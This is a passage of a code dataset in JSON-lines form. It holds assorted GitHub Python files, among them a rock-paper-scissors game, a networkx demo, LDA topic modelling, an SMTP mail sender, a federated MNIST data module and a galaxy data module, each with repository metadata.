rock_paper_scissors():\n choice = ('r', 'p', 's')\n user_choice = 0\n comp_won = 0\n user_won = 0\n\n while user_choice != 'no':\n user_choice = (input('Choose a play sign: (R)ock,(P)aper, (S)cissors or (No) if you want to close the game: '))\n user_choice = user_choice.lower()\n if user_choice == 'no':\n break\n\n comp_choice = random.choice(choice)\n print(user_choice)\n print(comp_choice)\n if user_choice == 'r' and comp_choice == 's' or user_choice == 's' and comp_choice == 'p' or user_choice == 'p' and comp_choice == 'r':\n print('+' + '-' * 10 + '+')\n print('| ' + 'You won!' + ' |')\n print('+' + '-' * 10 + '+')\n user_won += 1\n print('Current result: You {}:{} Computer'.format(user_won, comp_won))\n\n elif user_choice == 'r' and comp_choice == 'r' or user_choice == 's' and comp_choice == 's' or user_choice == 'p' and comp_choice == 'p':\n print('+' + '-' * 7 + '+')\n print('| ' + 'Draw!' + ' |')\n print('+' + '-' * 7 + '+')\n\n elif user_choice == 's' and comp_choice == 'r' or user_choice == 'p' and comp_choice == 's' or user_choice == 'r' and comp_choice == 'p':\n print('+' + '-' * 15 + '+')\n print('| ' + 'Computer won!' + ' |')\n print('+' + '-' * 15 + '+')\n comp_won += 1\n print('Current result: You {}:{} Computer'.format(user_won, comp_won))\n\n else:\n print('You have chose a wrong sign. Try again.')\n\n play_again = input('Do you want to play again? Write \"yes\" or \"no\".')\n play_again = play_again.lower()\n if play_again == 'yes' or play_again == 'y':\n print('=' * 80)\n elif play_again == 'no' or play_again == 'n':\n break\n\n\nrock_paper_scissors()\n\n\n\n\n\n","repo_name":"DariaBe/Prework_PfW","sub_path":"prework_isa.py","file_name":"prework_isa.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22170375995","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\n# create an emtry graph\ng = nx.Graph()\n\n# ----------------- adding nodes to graph -----------------\n# adding just one node (เพิ่ม 1 โหนด)\ng.add_node('a')\n# a list of nodes (เพิ่มโหนดแบบเป็นลิสต์, หลายโหนดทีเดียว)\ng.add_nodes_from(['b', 'c'])\ndemoNodes = ['d', 'g']\ng.add_nodes_from(demoNodes)\n# ---------------------------------------------------\n\n# ----------------- adding Edges to graph -----------------\n# จับคู่ edges\ng.add_edge(1, 2)\nedgeNo1 = ('x', 'z') # type : tuple ()\nedgeNo2 = ('p', 'q') # type : tuple ()\nedgeNo3 = [('a', 'c'), ('c', 'd'), ('a', 1), (1, 'd'), ('a', 2)] # type : list []\n# print(type(edgeNo3))\ng.add_edge(*edgeNo1)\ng.add_edge(*edgeNo2)\ng.add_edges_from(edgeNo3)\n# ---------------------------------------------------\nprint(f'nodes of graph : {g.nodes()}')\nprint(f'edges of graph : {g.edges()}')\nnx.draw(g, with_labels = True)\n\n# Save File\nplt.savefig('path_graph.png')\nplt.show()","repo_name":"Nattawut-CS/AI-Lab01","sub_path":"introduce_networkx.py","file_name":"introduce_networkx.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15819560228","text":"# coding=utf-8\nr\"\"\"Evaluation on detecting key events using a RNN.\n\"\"\"\nimport math\nimport torch\nimport numpy as np\nimport sklearn\n\nfrom datasets.dataset_splits import DATASET_TO_NUM_CLASSES\nimport utils.logging as logging\n\nlogger = logging.get_logger(__name__)\n\n\nclass VectorRegression(sklearn.base.BaseEstimator):\n \"\"\"Class to perform regression on multiple outputs.\"\"\"\n\n def __init__(self, estimator):\n self.estimator = estimator\n\n def fit(self, x, y):\n _, m = y.shape\n # Fit a separate regressor for each column of y\n self.estimators_ = [sklearn.base.clone(self.estimator).fit(x, y[:, i])\n for i in range(m)]\n return self\n\n def predict(self, x):\n # Join regressors' predictions\n res = [est.predict(x)[:, np.newaxis] for est in self.estimators_]\n return np.hstack(res)\n\n def score(self, x, y):\n # Join regressors' scores\n res = [est.score(x, y[:, i]) for i, est in enumerate(self.estimators_)]\n return np.mean(res)\n\n\ndef fit_model(train_embs, train_labels, val_embs, val_labels,\n global_step, num_classes, prefix, report_error=False):\n \"\"\"Linear Regression to regress to fraction completed.\"\"\"\n\n train_embs = np.concatenate(train_embs, axis=0)\n train_labels = np.concatenate(train_labels, axis=0)\n val_embs = np.concatenate(val_embs, axis=0)\n val_labels = np.concatenate(val_labels, axis=0)\n\n lin_model = VectorRegression(sklearn.linear_model.LinearRegression())\n lin_model.fit(train_embs, train_labels)\n\n train_score = lin_model.score(train_embs, train_labels)\n val_score = lin_model.score(val_embs, val_labels)\n\n return lin_model, train_score, val_score\n\ndef regression_labels_for_class(labels, class_idx):\n # Assumes labels are ordered. Find the last occurrence of particular class.\n transition_frame = np.argwhere(labels == class_idx)[-1, 0]\n return (np.arange(float(len(labels))) - transition_frame) / len(labels)\n\n\ndef get_regression_labels(class_labels, num_classes):\n regression_labels = []\n for i in range(num_classes - 1):\n regression_labels.append(regression_labels_for_class(class_labels, i))\n return np.stack(regression_labels, axis=1)\n\n\ndef get_targets_from_labels(all_class_labels, num_classes):\n all_regression_labels = []\n for class_labels in all_class_labels:\n all_regression_labels.append(get_regression_labels(class_labels,\n num_classes))\n return all_regression_labels\n\n\nclass EventCompletion(object):\n \"\"\"Predict event completion using linear regression.\"\"\"\n\n def __init__(self, cfg):\n self.cfg = cfg\n self.downstream_task = True\n\n def evaluate(self, dataset, cur_epoch, summary_writer, visualize=True):\n \"\"\"Labeled evaluation.\"\"\"\n fractions = self.cfg.EVAL.CLASSIFICATION_FRACTIONS\n\n train_embs = dataset['train_dataset']['embs']\n val_embs = dataset['val_dataset']['embs']\n num_classes = DATASET_TO_NUM_CLASSES[dataset['name']]\n\n if len(train_embs) == 0 or len(val_embs) == 0:\n raise ValueError('All embeddings are NAN. Something is wrong with model.')\n\n val_labels = get_targets_from_labels(dataset['val_dataset']['labels'],\n num_classes)\n\n num_samples = len(dataset['train_dataset']['embs'])\n val_scores = []\n for fraction in fractions:\n num_samples_used = max(1, int(fraction * num_samples))\n train_embs = dataset['train_dataset']['embs'][:num_samples_used]\n train_labels = get_targets_from_labels(\n dataset['train_dataset']['labels'][:num_samples_used], num_classes)\n model, train_score, val_score = fit_model(train_embs, train_labels, val_embs, val_labels,\n cur_epoch, num_classes, '%s_%s' % (dataset['name'], str(fraction)))\n prefix = '%s_%s' % (dataset['name'], str(fraction))\n logger.info('[Global step: {}] Event Completion {} Fraction Train '\n 'Score: {:.3f},'.format(cur_epoch, prefix, train_score))\n logger.info('[Global step: {}] Event Completion {} Fraction Val '\n 'Score: {:.3f},'.format(cur_epoch, prefix, val_score))\n summary_writer.add_scalar('event_completion/train_%s_score' % prefix,\n train_score, cur_epoch)\n summary_writer.add_scalar('event_completion/val_%s_score' % prefix,\n val_score, cur_epoch)\n val_scores.append(val_score)\n \n return val_scores[-1]\n","repo_name":"minghchen/CARL_code","sub_path":"evaluation/event_completion.py","file_name":"event_completion.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"41033099761","text":"# 给定一个包括 n 个整数的数组 nums 和 一个目标值 target。找出 nums 中的三个整数,使得它们的和与 target 最接近。返回这三个数的和\n# 。假定每组输入只存在唯一答案。 \n# \n# \n# \n# 示例: \n# \n# 输入:nums = [-1,2,1,-4], target = 1\n# 输出:2\n# 解释:与 target 最接近的和是 2 (-1 + 2 + 1 = 2) 。\n# \n# \n# \n# \n# 提示: \n# \n# \n# 3 <= nums.length <= 10^3 \n# -10^3 <= nums[i] <= 10^3 \n# -10^4 <= target <= 10^4 \n# \n# Related Topics 数组 双指针 \n# 👍 645 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def threeSumClosest(self, nums, target):\n res = sum(nums[:2]) + nums[-1]\n nums.sort()\n for i in range(len(nums)-2):\n l, r = i + 1, len(nums) - 1\n while l < r:\n temp = nums[i] + nums[l] + nums[r]\n if abs(temp - target) < abs(res - target):\n res = temp\n if temp == target:\n return target\n if temp > target:\n r -= 1\n else:\n l += 1\n return res\n# leetcode submit region end(Prohibit modification and deletion)\n\n\na = Solution()\nprint(a.threeSumClosest([-1,2,1,-4],1))\n","repo_name":"lishx-archive/Leetcode","sub_path":"leetcode/editor/cn/[16]最接近的三数之和.py","file_name":"[16]最接近的三数之和.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13624603683","text":"import os as _os\n\n####################################################################################################################################\n\n# get version\n\nclass Version:\n \"\"\"\n\n .. py:class:: Version\n\n This is the Version class for generating objects\n that contain the methods for getting and dumping\n the python-interface or kernel versions of the\n ParaMonte library installation on the system.\n\n **Parameters**\n\n versionPath\n A string containing the path to either the\n ParaMonte kernel or interface version file.\n\n versionType\n A string containing the type of the version\n file. It can be one of the following values:\n\n \"interface\"\n implying the Python-interface version\n number of the ParaMonte library.\n\n \"kernel\"\n implying the kernel-routines version\n number of the ParaMonte library.\n\n \"\"\"\n\n def __init__(self,versionPath,versionType):\n self._versionList = [\"interface\",\"kernel\"]\n self._versionPath = versionPath\n self._versionType = versionType\n self._versionSave = None\n self._checkVersionType()\n\n def get(self):\n \"\"\"\n\n .. py:method:: get(self)\n\n Get the Python-interface or kernel version of the\n ParaMonte library, in verbose format.\n\n **Parameters**\n\n None\n\n **Returns**\n\n None\n\n \"\"\"\n return \"ParaMonte Python \" + self._versionType.capitalize() + \" Version \" + self.dump()\n\n def dump(self):\n \"\"\"\n\n .. py:method:: dump(self)\n\n Dump **only the version number** of either\n the Python-interface or kernel of the\n ParaMonte library.\n\n **Parameters**\n\n None\n\n **Returns**\n\n None\n\n \"\"\"\n for versionType in self._versionList:\n if versionType==self._versionType:\n if self._versionSave is None:\n versionFileName = \".VERSION_\" + versionType.upper()\n versionFilePath = _os.path.join(self._versionPath, versionFileName)\n try:\n with open(versionFilePath,\"r\") as versionFile:\n self._versionSave = versionFile.readline().strip(\"\\n\")\n except:\n self._versionSave = \"UNKNOWN\"\n return self._versionSave\n else:\n return self._versionSave\n\n def _checkVersionType(self):\n versionTypeNotFound = True\n for versionType in self._versionList:\n if versionType==self._versionType:\n versionTypeNotFound = False\n break\n if versionTypeNotFound:\n _sys.exit(\"The input versionType is not a valid recognized version type. Possible values: \" + \" \".join(versionList))\n","repo_name":"rahuldwivedi01/paramonte","sub_path":"src/interface/Python/paramonte/_Version.py","file_name":"_Version.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"4972285930","text":"\"\"\"png_image_test.py\"\"\"\n\nimport unittest\nimport sys\nimport os\nsys.path.insert(0,\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n os.path.join('..', '..', '..')\n )\n)\n\nimport fpdf\nimport test\nfrom PIL import Image\n\nfrom test.utilities import relative_path_to, \\\n set_doc_date_0, \\\n calculate_hash_of_file\n\ndef goodFiles():\n not_supported = [\n \"e59ec0cfb8ab64558099543dc19f8378.png\", # Interlacing not supported:\n \"6c853ed9dacd5716bc54eb59cec30889.png\", # 16-bit depth not supported:\n \"ac6343a98f8edabfcc6e536dd75aacb0.png\", # Interlacing not supported:\n \"93e6127b9c4e7a99459c558b81d31bc5.png\", # Interlacing not supported:\n \"18f9baf3834980f4b80a3e82ad45be48.png\", # Interlacing not supported:\n \"51a4d21670dc8dfa8ffc9e54afd62f5f.png\", # Interlacing not supported:\n ]\n\n images = [relative_path_to(f) for f\n in os.listdir(relative_path_to('.'))\n if f.endswith(\".png\")\n and os.path.basename(f) not in not_supported]\n images.sort()\n rtn = []\n for image in images:\n if os.path.basename(image) in not_supported:\n pass\n else:\n rtn.append(image)\n return rtn\n\n\nclass InsertPNGSuiteFiles(unittest.TestCase):\n\n def test_insert_png_files(self):\n pdf = fpdf.FPDF(unit = 'pt')\n pdf.compress = False\n\n for image in goodFiles():\n pdf.add_page()\n pdf.image(\n image, x = 0, y = 0, w = 0, h = 0,\n type = '', link = None)\n set_doc_date_0(pdf)\n outfile = relative_path_to('insert_images_png_test_files.pdf')\n pdf.output(outfile, 'F')\n # print(calculate_hash_of_file(outfile))\n\n test_hash = calculate_hash_of_file(outfile)\n # ordered the images for reproduceability\n self.assertEqual(test_hash, \"0085260bea512b9394ce1502b196240a\")\n\n # self.assertEqual(test_hash, \"4f65582566414202a12ed86134de10a7\")\n os.unlink(outfile)\n\n def test_insert_png_files_From_PIL(self):\n pdf = fpdf.FPDF(unit = 'pt')\n pdf.compress = False\n for image in goodFiles():\n pdf.add_page()\n im = Image.open(image)\n pdf.image(\n im, x = 0, y = 0, w = 0, h = 0,\n type = '', link = None)\n\n set_doc_date_0(pdf)\n outfile = relative_path_to('insert_images_png_test_files.pdf')\n pdf.output(outfile, 'F')\n # print(calculate_hash_of_file(outfile))\n\n test_hash = calculate_hash_of_file(outfile)\n # ordered the images for reproduceability\n self.assertEqual(test_hash, \"3cfa70ad39cd595562b726fc16b8510d\")\n\n # self.assertEqual(test_hash, \"4f65582566414202a12ed86134de10a7\")\n os.unlink(outfile)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"inprojectspl/pyfpdf","sub_path":"test/image/png_images/png_file_test.py","file_name":"png_file_test.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73897238227","text":"from collections import *\n\nfactorial = [1] * 600\n\na = 1\nfor i in range(1, 500 + 1):\n a *= i\n factorial[i] = a\n\nf = open('input.txt')\nfor line in f:\n n = int(line)\n if n != 0:\n print(line.strip() + '!' + ' --')\n print(Counter(str(factorial[n])))\n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 324 Factorial frequencies/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"15507353449","text":"from sklearn.preprocessing import LabelEncoder, StandardScaler, Normalizer\nfrom sklearn.pipeline import make_pipeline\nimport pandas as pd\nimport time\n\ndef label_encode_data(df, columns):\n result = df.copy()\n \n label_encoder = LabelEncoder()\n \n for col in columns:\n result[col] = label_encoder.fit_transform(df[col])\n\n return result\n\ndef setup_pipeline(pipeline):\n return make_pipeline(*pipeline)\n\ndef normalize_data_pipeline(df, pipeline):\n transformer = setup_pipeline(pipeline)\n result = transformer.fit_transform(df)\n return pd.DataFrame(result, columns = df.columns)\n\ndef export_to_kaggle_csv(df, predictions):\n timestr = time.strftime(\"%Y%m%d_%H%M%S\")\n output_file_name = \"prediction_\" + timestr + \".csv\"\n\n my_submission = pd.DataFrame({'id': df[\"id\"], 'price': predictions})\n my_submission.to_csv('output/' + output_file_name, index=False)\n print(f\"Exportados los datos a: output/'{output_file_name}'\")\n ","repo_name":"rfminguez/w7-diamond_classification","sub_path":"src/transform_toolbox.py","file_name":"transform_toolbox.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28908624101","text":"#Data processing methodology procurred from: https://towardsdatascience.com/topic-modeling-and-latent-dirichlet-allocation-in-python-9bf156893c24\n\nimport json\nimport contractions\nimport gensim\nimport pickle\nimport re\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\nfrom nltk.stem.porter import *\nimport numpy as np\nimport nltk\n\ndef lemmatize_stemming(text):\n stemmer = SnowballStemmer(\"english\")\n return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))\n\n\ndef process_body(body, edited=False):\n ans = re.sub(r\"http\\S+\", \"\", body) # removes any links to other reddit posts\n\n# want to remove summary of posts, easiest to remove end ones\n tldr_index = ans.lower().find(\"tl;dr\")\n if tldr_index > (len(ans)//2):\n ans = ans[:tldr_index]\n# now check if the post has been edited\n# Most edit: remarks are thanking the commentors, which is not necessary for this project\n elif edited:\n edit_index = ans.lower().find(\"edit:\")\n if edit_index > (len(ans)//2):\n ans = ans[:edit_index]\n# TODO: Look into removing tl;dr's that come at the beginning of posts\n# TODO: Same algorithm for detecting when people put Edit: beginning\n\n# TODO: Expand contractions\n ans = contractions.fix(ans)\n# Tokenizing the body\n resulting_process = []\n# This applies lemmatization and stemming of the tokens\n for tkn in gensim.utils.simple_preprocess(ans):\n if tkn not in gensim.parsing.preprocessing.STOPWORDS and len(tkn) > 3:\n resulting_process.append(lemmatize_stemming(tkn))\n\n return resulting_process\n\n\n# Need to do this check so other files can use process_body\nif __name__ == '__main__':\n np.random.seed(2018)\n nltk.download('wordnet')\n temp_index = 0\n model_size = [5, 10, 15, 20]\n data = []\n\n with open('Raw Data/data.json') as fp:\n data = json.load(fp)\n\n# Preprocess all the bodies\n list_of_bodies = []\n pre_data = {'submissions': []}\n for x in range(len(data['submissions'])):\n data['submissions'][x]['body'] = process_body(data['submissions'][x]['body'], data['submissions'][x]['edited'])\n list_of_bodies.append(data['submissions'][x]['body'])\n\n# Creating the dictionary\n dictionary = gensim.corpora.Dictionary(list_of_bodies)\n\n# Getting some statistics on the generated dictionary\n total = 0\n count = 0\n for k, v in dictionary.iteritems():\n total += k\n count += 1\n print(\"Total number of words == \" + str(total))\n print(\"Number of unique tokens == \" + str(count))\n\n# making bag of words out of all the submission bodies\n bag_of_bow = [dictionary.doc2bow(sub) for sub in list_of_bodies]\n\n for topic_num in model_size:\n print('\\n\\n\\n*******TRAINING FOR TOPIC SIZE = ' + str(topic_num) + '****************\\n')\n print('Starting lda training ...')\n lda_model = gensim.models.LdaModel(bag_of_bow, num_topics=topic_num, id2word=dictionary, passes=2)\n print('Finished training!')\n\n # Printing the words from each topic\n for idx, topic in lda_model.print_topics(-1,10):\n print('Topic: {} \\nWords: {}'.format(idx, topic))\n\n\n # Saving all the stuff i might need to save like model, dictionary, and processed bodies\n lda_model.save('Raw Data/ldaModel'+str(topic_num))\n\n with open('Raw Data/dictionary', 'ab') as fp:\n pickle.dump(dictionary, fp)\n\n with open('Raw Data/preData.json', 'w') as fp:\n fp.seek(0)\n fp.truncate()\n json.dump(data, fp)\n\n","repo_name":"terrie9876/LoveAdviceBot","sub_path":"ModelMaker.py","file_name":"ModelMaker.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16857098673","text":"import configparser\nimport os\nimport smtplib \nimport logging\nfrom email.mime import multipart\nfrom email.mime.text import MIMEText\nfrom smtplib import SMTPException\n\n#创建日志\nlog_format = '%(filename)s %(asctime)s %(levelname)s: %(message)s' \nlogging.basicConfig(format = log_format,level = logging.ERROR,filename = 'error.log',filemode = 'w')\nlogger = logging.getLogger(__name__)\n \n#创建配置文件解析对象\nconfig = configparser.ConfigParser()\n#加载配置文件\nconfig.read(\"MailConfiguration.ini\")\n#获取参数\nsender = config.get('Mail', 'sender')\nreceiver = config.get('Mail', 'receiver') \nfiles_path = config.get('File', 'path')\nmail_host = config.get('Mail', 'mail_host')\nmail_port = config.get('Mail', 'mail_port')\nmail_pass = config.get('Mail', 'mail_pass')\n\nmsg = multipart.MIMEMultipart() \nmsg['from'] = sender\nmsg['to'] = receiver\n#标题\nmsg['subject'] = config.get('Title','title') \n#正文\ncontent = MIMEText(config.get('Body', 'body'))\nmsg.attach(content)\nsmtp = None\n\ntry:\n #添加多个附件\n for file_path in files_path.split(','):\n basename = os.path.basename(file_path)\n f = open(file_path,'rb')\n \n att = MIMEText(f.read(),'base64','utf-8') \n att[\"Content-Type\"] = 'application/octet-stream'\n att.add_header('Content-Disposition', 'attachment',filename=('gbk', '', basename))\n msg.attach(att)\n \n smtp = smtplib.SMTP() #登录邮箱服务器\n smtp.connect(mail_host,mail_port) #连接邮箱服务器\n smtp.login(sender,mail_pass) #开始登录\n smtp.sendmail(sender,receiver,msg.as_string()) #发送邮件\nexcept IOError as e:\n logger.error(e)\nexcept SMTPException as e:\n logger.error(e)\nexcept Exception as e:\n logger.error(e)\nfinally:\n if smtp:\n smtp.close()\n\n","repo_name":"sunzhengbo/learning","sub_path":"Python/SendMail/SendMail.py","file_name":"SendMail.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4773142539","text":"import re\nimport nltk\nnltk.download('punkt')\n\n# Deals with cleaning text for now\nimport string\nfrom nltk.corpus import stopwords\nnltk.download('stopwords')\nfrom nltk.tokenize import word_tokenize\n\ndef clean_text(data):\n data = \"\".join([word for word in data if word not in string.punctuation])\n data = word_tokenize(data)\n\n data = [word for word in data if word not in stopwords.words('english')]\n return data\n\nt1 = 'i left with my bouquet of red and yellow tulips under my arm feeling slightly more optimistic than when i arrived'\nt2 = 'i was feeling a little vain when i did this one'\nt3 = 'i cant walk into a shop anywhere where i do not feel uncomfortable'\n\ntext = clean_text(t1)\ntext_train = clean_text(t2)\ntext_test = clean_text(t3)\n\nprint(text)\nprint(text_train)\nprint(text_test)\n# tokenizer = Tokenizer()\n# tokenizer.fit_on_texts(texts)\n# sequence_train = tokenizer.texts_to_sequences(texts_train)\n# sequence_test = tokenizer.texts_to_sequences(texts_test)\n","repo_name":"Maria-Gomes/CSE400-NLP","sub_path":"basic_text_cleaning.py","file_name":"basic_text_cleaning.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40392704989","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport pandas as pandas\nimport csv\n\n\ndata = pandas.read_csv(\"/ST-Steiner-env/ST-Steiner/clusters/cluster_n3_05.txt\")\nG = nx.Graph()\n\nfor i in range(len(data)):\n G.add_edge(data.iloc[i][0].split(\"\\t\")[1], data.iloc[i][0].split(\"\\t\")[0])\n\nplt.figure(figsize=(30,30))\n\n\ngraph_pos = nx.spring_layout(G)\nnx.draw_networkx_nodes(G, graph_pos, node_size=10, node_color='blue', alpha=0.5)\nnx.draw_networkx_edges(G, graph_pos, edge_size=6)\nnx.draw_networkx_labels(G, graph_pos, font_size=6, font_family='sans-serif')\nplt.savefig(\"plot.png\", dpi=1000)\n\nplt.savefig(\"plot.pdf\")\nplt.show()\n\n","repo_name":"keremayoz/STSteinerSolver","sub_path":"solver/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30974724327","text":"import tkinter as tk\n\n\nclass APP:\n def __init__(self,master):\n frame = tk.Frame(master)\n frame.pack(side=tk.LEFT,padx=10,pady=10)\n #------在这里用LEFT设置他出现的位置\n\n #----Button 设置一个按钮 frame按钮显示什么字体 bg背景色什么色 fg字体什么颜色, command =他就是如果点击他会出现执行哪些方法\n self.hi_there = tk.Button(frame,text = \"打招呼\",bg=\"black\",fg=\"white\",command=self.say_hi)\n self.hi_there.pack()\n\n def say_hi(self):\n print(\"大家好啊啊啊啊啊啊\")\n\n\n\n\nroot = tk.Tk()\napp = APP(root)\n\n\nroot.mainloop()\n","repo_name":"jiangfeng123/pygame","sub_path":"每日任务/爬虫的自我修养/gui的最终选择 tkinter/tk1.py","file_name":"tk1.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73454688786","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import tree\nfrom matplotlib import pyplot as plt\nplt.style.use('ggplot')\nfrom sklearn.tree import DecisionTreeClassifier\nimport sklearn.metrics as metrics\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder\nimport random as random\nfrom sklearn.ensemble import RandomForestClassifier \n\n\ndf_train = pd.read_csv(\"glass.test\", skiprows=1, header=None)\n# df_test[9]=LabelEncoder().fit_transform(df_test[9].values)\n\ndf = pd.read_csv(\"glass.data\", skiprows=1, header=None)\n# df[9]=LabelEncoder().fit_transform(df[9].values)\n\n\ndef bagging(df_train,df_test, sampleTimes, trainTimes):\n result=pd.DataFrame(data=0,index=range(0,len(df_test)),columns=df_test[df_test.columns[-1]].unique())\n result_entropy=pd.DataFrame(data=0,index=range(0,len(df_test)),columns=df_test[df_test.columns[-1]].unique())\n vote_result=[]\n vote_result_entropy=[]\n for i in range(0, trainTimes):\n df_temp = df_train.iloc[0:1, :]\n # 随机采样 \n for j in range(0, sampleTimes):\n temp = random.randint(0, len(df_train)-1)\n df_temp = df_temp.append(df_train.loc[temp:temp], ignore_index=True)\n x_train=df_temp.iloc[:,:9]\n y_train=df_temp.iloc[:,9:]\n #创建弱训练器并训练\n clf = tree.DecisionTreeClassifier(random_state=42)\n clf_entropy = tree.DecisionTreeClassifier(criterion='entropy',random_state=42)\n clf.fit(x_train,y_train)\n clf_entropy.fit(x_train,y_train)\n x_test=df_test.iloc[:,:9]\n #获得单次训练器的结果\n result_temp=clf.predict(x_test)\n result_temp_entropy=clf_entropy.predict(x_test)\n #存储结果用于投票\n count=0\n for item in result_temp:\n result[item][count]+=1\n count+=1\n count=0\n for item in result_temp_entropy:\n result_entropy[item][count]+=1\n count+=1\n #开始投票\n lists=list(result.columns)\n for i in range(0,len(df_test)):\n max=0\n temp=0\n for j in range(0,len(result.columns)):\n if max self.number_sub:\n raise (f\"Not exist the subset {self.sub_id}\")\n\n # Training / validation set\n trainset = MnistFederatedDM.mnist_train\n rows_by_sub = floor(len(trainset) / self.number_sub)\n tr_subset = Subset(\n trainset, range(self.sub_id * rows_by_sub, (self.sub_id + 1) * rows_by_sub)\n )\n mnist_train, mnist_val = random_split(\n tr_subset,\n [\n round(len(tr_subset) * (1 - self.val_percent)),\n round(len(tr_subset) * self.val_percent),\n ],\n )\n\n # Test set\n testset = MnistFederatedDM.mnist_val\n rows_by_sub = floor(len(testset) / self.number_sub)\n te_subset = Subset(\n testset, range(self.sub_id * rows_by_sub, (self.sub_id + 1) * rows_by_sub)\n )\n\n if len(testset) < self.number_sub:\n raise (\"Too much partitions\")\n\n # DataLoaders\n self.train_loader = DataLoader(\n mnist_train,\n batch_size=self.batch_size,\n shuffle=True,\n num_workers=self.num_workers,\n )\n self.val_loader = DataLoader(\n mnist_val,\n batch_size=self.batch_size,\n shuffle=False,\n num_workers=self.num_workers,\n )\n self.test_loader = DataLoader(\n te_subset,\n batch_size=self.batch_size,\n shuffle=False,\n num_workers=self.num_workers,\n )\n # print(f\"Train: {len(mnist_train)} Val:{len(mnist_val)} Test:{len(te_subset)}\")\n\n def train_dataloader(self):\n \"\"\" \"\"\"\n return self.train_loader\n\n def val_dataloader(self):\n \"\"\" \"\"\"\n return self.val_loader\n\n def test_dataloader(self):\n \"\"\" \"\"\"\n return self.test_loader\n","repo_name":"pguijas/p2pfl","sub_path":"p2pfl/learning/pytorch/mnist_examples/mnistfederated_dm.py","file_name":"mnistfederated_dm.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"37070506571","text":"\nfrom typing import Optional\nimport logging\nfrom functools import partial\n\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport torch\nfrom torch.utils.data import DataLoader\nimport pytorch_lightning as pl\nfrom torchvision import transforms\n\nfrom galaxy_datasets.pytorch import galaxy_dataset\nfrom galaxy_datasets.transforms import default_transforms\n\n\n# https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html\nclass GalaxyDataModule(pl.LightningDataModule):\n # takes generic catalogs (which are already downloaded and happy),\n # splits if needed, and creates generic datasets->dataloaders etc\n # easy to make dataset-specific default transforms if desired\n def __init__(\n self,\n label_cols,\n # provide full catalog for automatic split, or...\n catalog=None,\n train_fraction=0.7,\n val_fraction=0.1,\n test_fraction=0.2,\n # provide train/val/test catalogs for your own previous split\n train_catalog=None,\n val_catalog=None,\n test_catalog=None,\n predict_catalog=None,\n # augmentation params (sensible supervised defaults)\n greyscale=True,\n # album=False, # now True always\n crop_scale_bounds=(0.7, 0.8),\n crop_ratio_bounds=(0.9, 1.1),\n resize_after_crop=224,\n custom_albumentation_transform=None, # will override the settings above\n # hardware params\n batch_size=256, # careful - will affect final performance\n use_memory=False, # deprecated\n num_workers=4,\n prefetch_factor=4,\n seed=42\n ):\n super().__init__()\n\n if catalog is not None: # catalog provided, should not also provide explicit split catalogs\n assert train_catalog is None\n assert val_catalog is None\n assert test_catalog is None\n else: # catalog not provided, must provide explicit split catalogs - at least one\n assert (train_catalog is not None) or (val_catalog is not None) or (test_catalog is not None) or (predict_catalog is not None)\n # see setup() for how having only some explicit catalogs is handled\n\n self.label_cols = label_cols\n\n self.catalog = catalog\n self.train_catalog = train_catalog\n self.val_catalog = val_catalog\n self.test_catalog = test_catalog\n self.predict_catalog = predict_catalog\n\n self.batch_size = batch_size\n\n self.use_memory = use_memory\n if self.use_memory:\n raise NotImplementedError\n\n self.num_workers = num_workers\n self.seed = seed\n\n assert np.isclose(train_fraction + val_fraction + test_fraction, 1.)\n self.train_fraction = train_fraction\n self.val_fraction = val_fraction\n self.test_fraction = test_fraction\n\n self.prefetch_factor = prefetch_factor\n self.dataloader_timeout = 600 # seconds aka 10 mins\n\n logging.info('Num workers: {}'.format(self.num_workers))\n logging.info('Prefetch factor: {}'.format(self.prefetch_factor))\n\n\n if custom_albumentation_transform is not None:\n self.custom_albumentation_transform = custom_albumentation_transform\n logging.info('Using custom albumentations transform for augmentations')\n else:\n self.resize_after_crop = resize_after_crop\n self.crop_scale_bounds = crop_scale_bounds\n 